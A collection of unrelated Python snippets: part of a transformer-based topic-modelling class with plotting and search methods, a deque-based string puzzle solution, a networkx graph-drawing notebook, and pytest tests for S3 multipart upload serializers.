documents = list(topicDf["text"])
keywords, scores = self.clusterRepresentator.fit_transform(
documents, nKeywords)
assert len(keywords) == len(scores)
self.clusterRepresentations[cluster_idx] = {
keywords[i]: scores[i] for i in range(len(keywords))}
self.topicNames[cluster_idx] = "_".join(
keywords[:4])+"."+str(cluster_idx)
def showWordclouds(self,
topicsToShow=None,
nWordsToShow=25,
clusterRepresentator=None,
saveToFilepath=None
):
"""
Computes cluster representations and uses them to show wordclouds.
topicsToShow: set with topics indexes to print. If None all topics are chosen.
nWordsToShow: how many words to show for each topic
clusterRepresentator: an instance of a clusterRepresentator
saveToFilepath: save the wordcloud to this filepath
"""
self._computeClusterRepresentations(
topics=topicsToShow,
nKeywords=nWordsToShow,
clusterRepresentator=clusterRepresentator
)
        if topicsToShow is None:
            topicsToShow = range(self.nTopics)
        for topicIdx in topicsToShow:
print("Topic %d" % topicIdx)
wordScores = self.clusterRepresentations[topicIdx]
showWordCloudFromScoresDict(
wordScores, max_words=nWordsToShow, filepath=saveToFilepath)
def searchForWordInTopics(self,
word,
topicsToSearch=None,
topNWords=15,
clusterRepresentator=None):
"""
Returns any topic containing 'word' in the topNWords of its cluster representation
word: the word to look for
topicsToSearch: set with topics indexes to search in. If None all topics are searched in.
nWordsToShow: how many words to show for each topic
clusterRepresentator: an instance of a clusterRepresentator
"""
if topicsToSearch is None:
topicsToSearch = set(range(self.nTopics))
self._computeClusterRepresentations(
topics=topicsToSearch,
nKeywords=topNWords,
clusterRepresentator=clusterRepresentator
)
positive_topics = set()
for tidx in topicsToSearch:
if word in self.clusterRepresentations[tidx].keys():
positive_topics.add(tidx)
return positive_topics
def prettyPrintTopics(self, topicsToPrint=None, nWordsToShow=5):
"""
Pretty prints topics.
topicsToPrint: set with topics indexes to print. If None all topics are chosen.
nWordsToShow: how many words to show for each topic
"""
if self.clusterRepresentations is None:
self._computeClusterRepresentations()
if topicsToPrint is None:
topicsToPrint = set(range(self.nTopics))
for topicIdx in topicsToPrint:
print(f"\nTopic {topicIdx}")
representationItems = self.clusterRepresentations[topicIdx].items()
wordFrequencies = sorted(
representationItems, key=lambda x: x[1], reverse=True)
for word, frequency in wordFrequencies[:nWordsToShow]:
print("\n%10s:%2.3f" % (word, frequency))
def showTopicSizes(self,
showTopNTopics=None,
minSize=None,
batches=None):
"""
Show bar chart with topic sizes (n. of documents).
Returns list of topic indexes with more than minSize documents.
showTopNTopics: if integer, show only this number of largest sized topics. If None it is ignored.
minSize: show only topics with bigger size than this. If None ignore
batches: which batches to include. If None include all known documents.
"""
if batches is None:
batches = {k for k in range(1, self.nBatches+1)}
if minSize is None and showTopNTopics is None:
plotIndexIsRange = True
else:
plotIndexIsRange = False
topicIndexes = []
self.topicSizes = []
df = self.df
for k in range(self.nTopics):
# docsK = self.topicsToDocumentIds[k]
docsK = df.loc[(df['batch'].isin(batches)) & (df["topic"] == k)]
ndocs = len(docsK)
if minSize is None or ndocs > minSize:
if plotIndexIsRange:
topicIndexes.append(k)
else:
topicIndexes.append(str(k))
self.topicSizes.append(ndocs)
# logger.debug(f"batches: {batches}, self.topicSizes: {self.topicSizes}")
if showTopNTopics is None:
indexes = topicIndexes
sizes = self.topicSizes
else:
argsort = np.argsort(self.topicSizes)[::-1]
indexes = []
sizes = []
for i in argsort[:showTopNTopics]:
# indexes = topicIndexes[:showTopNTopics]
if plotIndexIsRange:
indexes.append(topicIndexes[i])
else:
indexes.append(str(topicIndexes[i]))
sizes.append(self.topicSizes[i])
# print(f"index: {indexes}, sizes: {sizes}")
# plt.bar(indexes, sizes)
# plt.show()
plot_ = sns.barplot(x=indexes, y=sizes, palette='colorblind')
if len(indexes) > 25:
modulo = len(indexes) // 20
for ind, label in enumerate(plot_.get_xticklabels()):
if ind % modulo == 0: # every 10th label is kept
label.set_visible(True)
else:
label.set_visible(False)
return [int(k) for k in indexes]
def showTopicTrends(self,
topicsToShow=None,
batches=None,
resamplePeriod='6M',
scrambleDates=False,
normalize=False,
fromDate=None,
toDate=None,
saveToFilepath=None,
**plotkwargs
):
"""
Show a time plot of popularity of topics. On the y-axis the count of sentences in that topic is shown. If normalize is set to True, the percentage of sentences in that topic (when considering all the sentences in the whole corpus in that time slot) is shown.
topicsToShow: set with topics indexes to print. If None all topics are chosen.
batches: which batches to include. If None include all known documents.
resamplePeriod: resample to pass to pandas.DataFrame.resample.
normalize: if False count of sentences is shown. If True percentages relative to the whole corpus.
scrambleDates: if True, redistributes dates that are on 1st of the month (year) uniformly in that month (year)
"""
self._computeClusterRepresentations(topics=topicsToShow)
if topicsToShow is None:
topicsToShow = range(self.nTopics)
if batches is None:
batches = {k for k in range(1, self.nBatches+1)}
        if scrambleDates:
df = scrambleDateColumn(self.df, "date")
else:
df = self.df
# we need to build a common index to plot all the resampled time series against
date_range = self.df[self.df['topic'] != -1].set_index('date')
alltimes = date_range.resample(resamplePeriod).count()['id']
df = df[df['batch'].isin(batches)]
resampledDfs = {}
resampledColumns = {}
topicsToResample = topicsToShow if not normalize else list(
range(self.nTopics))
for topicIdx in topicsToResample:
tseries = df.loc[df["topic"] == topicIdx, ["date", "topic"]]
tseries = tseries.set_index("date")
resampled = tseries.resample(resamplePeriod).count().rename(
{"topic": 'count'}, axis=1)['count']
# use the common index
resampled = resampled.reindex(alltimes.index, method='ffill')
resampled.sort_index(inplace=True)
resampledDfs[topicIdx] = resampled.fillna(0)
resampledColumns[topicIdx] = self.topicNames[topicIdx] if topicIdx in self.topicNames else 'Topic %d' % topicIdx
if normalize:
from functools import reduce
totsum = reduce(lambda x, y: x + y, resampledDfs.values())
normalizedDfs = {}
for topicIdx, rs in resampledDfs.items():
normalizedDfs[topicIdx] = (rs/totsum).fillna(0)
resampledDfs = normalizedDfs
# dfToPlot = pd.DataFrame(columns=[resampledColumns[tidx] for tidx in topicsToShow], index=alltimes.index)
dfToPlot = pd.DataFrame(index=alltimes.index)
for topicIdx in topicsToShow:
rsDf = resampledDfs[topicIdx]
column = resampledColumns[topicIdx]
dfToPlot[column] = rsDf
if fromDate is not None:
dfToPlot = dfToPlot.loc[dfToPlot.index > fromDate]
if toDate is not None:
dfToPlot = dfToPlot.loc[dfToPlot.index < toDate]
axis = dfToPlot.interpolate(method='linear').plot(**plotkwargs)
if saveToFilepath is not None:
axis.figure.savefig(saveToFilepath)
return dfToPlot
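# Minimal usage sketch (illustrative only): `docs` and its contents are assumptions,
# not part of this module, and training downloads a SentenceTransformer model,
# so the sketch is left commented out.
# if __name__ == "__main__":
#     docs = pd.DataFrame({
#         "date": ["2021-01-01", "2021-02-01", "2021-03-01"],
#         "text": ["First example text.", "Second example text.", "Third example text."],
#     })
#     tt = TransformerTopic(hdbscanMinClusterSize=2)
#     tt.train(documentsDataFrame=docs, dateColumn="date", textColumn="text")
#     tt.prettyPrintTopics(nWordsToShow=5)
#     tt.savePickle("transformertopic_model.pkl")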
|
# -*- coding: utf-8 -*-
def main():
from collections import deque
import sys
input = sys.stdin.readline
s = input().rstrip()
t = deque()
r_count = 0
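    # Track reversal parity instead of reversing the string on every "R":
    # with an even count, work at the right end of the deque, with an odd
    # count at the left end; a character equal to the current end cancels it
    # (pop) instead of being appended. One final reverse fixes the orientation.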
for si in s:
if si == "R":
r_count += 1
else:
if r_count % 2 == 0:
if t and t[-1] == si:
t.pop()
else:
t.append(si)
else:
if t and t[0] == si:
t.popleft()
else:
t.appendleft(si)
ans = list(t)
if r_count % 2 == 1:
ans = reversed(ans)
print("".join(ans))
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
import networkx as nx
import matplotlib.pyplot as plt
# In[ ]:
nx.draw_networkx(nx.lollipop_graph(10, 5))
# In[ ]:
nx.draw_networkx(nx.balanced_tree(2, 3))
# In[ ]:
nx.Graph()
nx.DiGraph()
nx.MultiGraph()
nx.MultiDiGraph()
# In[ ]:
G = nx.Graph()
G.add_node(1)
G.add_node("Hello World")
nx.draw_networkx(G)
# In[ ]:
G = nx.Graph()
G.add_node(1)
G.add_nodes_from([2, 4, 6])
nx.draw_networkx(G)
# In[ ]:
G = nx.Graph()
G.add_nodes_from(nx.path_graph(10))
nx.draw_networkx(G)
# In[ ]:
nx.draw_networkx(nx.path_graph(10))
# In[ ]:
G = nx.Graph()
G.add_edge(1, 2)
G.add_edge(2, 3)
nx.draw_networkx(G)
# In[ ]:
G = nx.Graph()
G.add_edges_from([(1, 2), (1, 3)])
nx.draw_networkx(G)
# In[ ]:
G = nx.Graph()
G.add_edges_from(nx.path_graph(10).edges)
nx.draw_networkx(G)
# In[ ]:
G.clear()
nx.draw_networkx(G)
# In[ ]:
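# Note: the cell below assumes an existing pandas DataFrame `df` with columns
# 'src', 'targ' and 'attr' (it is not defined in this notebook).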
nx.from_pandas_edgelist(df, source="src", target="targ", edge_attr="attr", create_using=nx.DiGraph())
|
import pytest
from s3_file_field._multipart import (
InitializedPart,
InitializedUpload,
PartFinalization,
UploadFinalization,
)
from s3_file_field.views import (
UploadFinalizationRequestSerializer,
UploadInitializationRequestSerializer,
UploadInitializationResponseSerializer,
)
@pytest.fixture
def initialization() -> InitializedUpload:
return InitializedUpload(
object_key='test-object-key',
upload_id='test-upload-id',
parts=[
InitializedPart(
part_number=1,
size=10_000,
upload_url='http://minio.test/test-bucket/1',
),
InitializedPart(
part_number=2,
size=3_500,
upload_url='http://minio.test/test-bucket/2',
),
],
)
def test_upload_request_deserialization():
serializer = UploadInitializationRequestSerializer(
data={
'field_id': 'package.Class.field',
'file_name': 'test-name.jpg',
'file_size': 15,
}
)
assert serializer.is_valid(raise_exception=True)
request = serializer.validated_data
assert isinstance(request, dict)
def test_upload_initialization_serialization(
initialization: InitializedUpload,
):
serializer = UploadInitializationResponseSerializer(initialization)
assert isinstance(serializer.data, dict)
def test_upload_finalization_deserialization():
serializer = UploadFinalizationRequestSerializer(
data={
'field_id': 'package.Class.field',
'object_key': 'test-object-key',
'upload_id': 'test-upload-id',
'parts': [
{'part_number': 1, 'size': 10_000, 'etag': 'test-etag-1'},
{'part_number': 2, 'size': 3_500, 'etag': 'test-etag-2'},
],
}
)
assert serializer.is_valid(raise_exception=True)
finalization = serializer.save()
assert isinstance(finalization, UploadFinalization)
assert all(isinstance(part, PartFinalization) for part in finalization.parts)
|